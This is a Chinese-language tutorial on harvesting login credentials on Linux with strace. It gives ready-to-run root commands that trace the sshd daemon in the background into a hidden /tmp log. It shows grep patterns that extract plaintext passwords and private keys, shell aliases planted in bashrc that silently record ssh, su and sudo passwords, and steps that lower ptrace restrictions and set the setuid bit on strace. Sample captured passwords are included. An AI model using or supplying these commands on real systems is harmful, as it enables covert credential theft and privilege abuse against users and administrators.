Linux使用Strace收集登录凭证

strace是什么？

按照strace官网的描述, strace是一个可用于诊断、调试和教学的Linux用户空间跟踪器。我们用它来监控用户空间进程和内核的交互，比如系统调用、信号传递、进程状态变更等。

strace使用条件

Linux Kernel 3.4及更高版本支持完全限制或禁用ptrace的功能。可以通过使用sysctl将kernel.yama.ptrace_scope设置为1、2或3来完成。默认情况下，发行版都将其设置为1，根据Linux Kernel Yama Documentation数字0、1、2、3对应以下权限：
0.经典ptrace权限
1.受限制的ptrace
2.仅限管理员附加
3.没有连接
通过运行sysctl kernel.yama.ptrace_scope=3在系统上禁用ptrace,但这操作可能会破坏正在运行的其他程序。

安装strace

yum install strace -y
apt install strace -y

若不能出网，上传对应安装包，手工安装，或者编译安装

查看修改strace配置

# 查看
cat /proc/sys/kernel/yama/ptrace_scope
# 修改
echo 0 > /proc/sys/kernel/yama/ptrace_scope 或者 sysctl kernel.yama.ptrace_scope=0
# 当kernel.yama.ptrace_scope的值设置为3后，必须重启系统后才能更改

strace使用选项

-c 统计每一系统调用的所执行的时间,次数和出错的次数等.
-d 输出strace关于标准错误的调试信息.
-f 跟踪由fork调用所产生的子进程.
-ff 如果提供-o filename,则所有进程的跟踪结果输出到相应的filename.pid中,pid是各进程的进程号.
-F 尝试跟踪vfork调用.在-f时,vfork不被跟踪.
-h 输出简要的帮助信息.
-i 输出系统调用的入口指针.
-q 禁止输出关于脱离的消息.
-r 打印出相对时间关于,,每一个系统调用.
-t 在输出中的每一行前加上时间信息.
-tt 在输出中的每一行前加上时间信息,微秒级.
-ttt 微秒级输出,以秒了表示时间.
-T 显示每一调用所耗的时间.
-v 输出所有的系统调用.一些调用关于环境变量,状态,输入输出等调用由于使用频繁,默认不输出.
-V 输出strace的版本信息.
-x 以十六进制形式输出非标准字符串
-xx 所有字符串以十六进制形式输出.
-a column 设置返回值的输出位置.默认 为40.
-e expr 指定一个表达式,用来控制如何跟踪.格式：[qualifier=][!]value1[,value2]...
qualifier只能是 trace,abbrev,verbose,raw,signal,read,write其中之一.value是用来限定的符号或数字.默认的 qualifier是 trace.感叹号是否定符号.例如:-eopen等价于 -e trace=open,表示只跟踪open调用.而-etrace!=open 表示跟踪除了open以外的其他调用.有两个特殊的符号 all 和 none. 注意有些shell使用!来执行历史记录里的命令,所以要使用\\.
-e trace=set 只跟踪指定的系统 调用.例如:-e trace=open,close,rean,write表示只跟踪这四个系统调用.默认的为set=all.
-e trace=file 只跟踪有关文件操作的系统调用.
-e trace=process 只跟踪有关进程控制的系统调用.
-e trace=network 跟踪与网络有关的所有系统调用.
-e strace=signal 跟踪所有与系统信号有关的 系统调用
-e trace=ipc 跟踪所有与进程通讯有关的系统调用
-e abbrev=set 设定strace输出的系统调用的结果集.-v 等与 abbrev=none.默认为abbrev=all.
-e raw=set 将指定的系统调用的参数以十六进制显示.
-e signal=set 指定跟踪的系统信号.默认为all.如 signal=!SIGIO(或者signal=!io),表示不跟踪SIGIO信号.
-e read=set 输出从指定文件中读出 的数据.例如: -e read=3,5
-e write=set 输出写入到指定文件中的数据.
-o filename 将strace的输出写入文件filename
-p pid 跟踪指定的进程pid.
-s strsize 指定输出的字符串的最大长度.默认为32.文件名一直全部输出.
-u username 以username的UID和GID执行被跟踪的命令

获取sshd进程明文密码

1.root权限执行：

# 使用括号执行程序，当前shell退出，执行的程序不会退出
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

2.使用正则表达式查找
查找用户名和密码的正则表达式为：read\(6, ".+\\0\\0\\0\\.+"
查找用户名和密码：

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

结果形式如下：

[pid  2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9
[pid  2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27
[pid  2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9

获取sshd进程私钥

1.在ROOT权限下执行：

# 使用括号执行程序，当前shell退出，执行的程序不会退出
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)

2.直接查找私钥字符串PRIVATE KEY
查找用户名和密码：

#如果私钥设置的了密码，可能会找不到私钥密码
grep 'PRIVATE KEY' /tmp/.sshd.log

结果形式如下：

[pid  1009] 23:17:34 read(4, "-----BEGIN OPENSSH PRIVATE KEY-----\nb.................bGk=\n-----END OPENSSH PRIVATE KEY-----\n", 4096) = 2590

收集ssh登录凭证

1.添加命令别名：

vi ~/.bashrc或者/etc/bashrc
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh'
# 使命令别名立即生效
source ~/.bashrc

2.记录在strace文件内容如下：

936   write(4, "[email protected]'s password: ", 32) = 32
936   read(4, "t", 1)                   = 1
936   read(4, "o", 1)                   = 1
936   read(4, "o", 1)                   = 1
936   read(4, "r", 1)                   = 1
936   read(4, "\n", 1)                  = 1
936   write(4, "\n", 1)                 = 1

3.也可以通过正则.+@.+\bpassword定位密码位置，这里就不演示

收集su、sudo等需要提升权限运行的程序的登录凭证

1.给strace程序添加suid权限，即以root权限执行

# 查看strace文件位置
which strace
/usr/bin/strace
# 添加suid权限
chmod +s /usr/bin/strace

2.添加命令别名

# 添加命令别名
vi ~/.bashrc或者/etc/bashrc
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-`date '+%d%h%m%s'`.log -s 32 sudo'
alias su='strace -f -e trace=read,write -o /tmp/.su-`date '+%d%h%m%s'`.log -s 32 su'
# 使命令别名立即生效
source ~/.bashrc

3.记录的strace文件如下：

write(6, "[sudo] password for kali: ", 26) = 26
read(6, "i", 1)                         = 1
read(6, "l", 1)                         = 1
read(6, "a", 1)                         = 1
read(6, "k", 1)                         = 1
read(6, "\n", 1)                        = 1

4.根据程序运行输出的特征字符串定位密码位置

END

当linux系统配置文件/proc/sys/kernel/yama/ptrace_scope值不为3时，可以通过strace记录任何程序的系统调用（常用read、write调用）来获取登录凭证

参考链接

https://strace.io/
https://man7.org/linux/man-pages/man1/strace.1.html
https://klionsec.github.io/2016/09/22/strace/
https://blog.netspi.com/using-strace-to-monitor-ssh-connections-on-linux/
https://www.kernel.org/doc/Documentation/security/Yama.txt